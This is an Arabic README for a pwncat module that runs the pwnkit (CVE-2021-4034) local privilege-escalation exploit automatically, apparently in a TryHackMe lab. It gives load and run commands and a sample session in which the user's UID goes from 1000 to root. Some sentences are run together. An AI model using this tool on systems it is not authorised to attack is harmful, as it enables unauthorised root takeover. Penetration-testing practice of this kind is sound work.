
وحدة pwncat تستغل تلقائيًا ثغرة CVE-2021-4034 (pwnkit)
الغرض من هذه الوحدة هو محاولة استغلال CVE-2021-4034 (pwnkit) على الهدف عند استخدام pwncat.
لا حاجة لإعداد أي مجلدات، أو تجميع أي كود مصدري، أو حتى وجود gcc على الهدف البعيد؛ فوحدة pwnkit تتولى ذلك تلقائيًا باستخدام إطار عمل pwncat.
pwnkit.py إلى أي مكان على جهازك حيث تم تثبيت pwncat-cs. على سبيل المثال: /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit. يجب أن ترى شيئًا مثل هذا:(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit. إذا نجح الأمر، يجب أن ترى UID يتغير إلى 0، وتصبح الآن root. على سبيل المثال:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load في كل مرة، يمكنك جعل pwncat يقوم بتحميل هذه الوحدة تلقائيًا عند بدء التشغيل بوضعها في ~/.local/share/pwncat/modules# Set the gcc path
set cross "/usr/bin/gcc"
تحية خاصة إلى Caleb Stewart لمساعدته القيّمة بينما كنت أتعلم إطار عمل pwncat من منظور مطوّر. سأقدم طلب سحب لوضع هذا في وحدة pwncat escalate الرئيسية يومًا ما عندما يتوفر لدي وقت فراغ... أعدك. :-)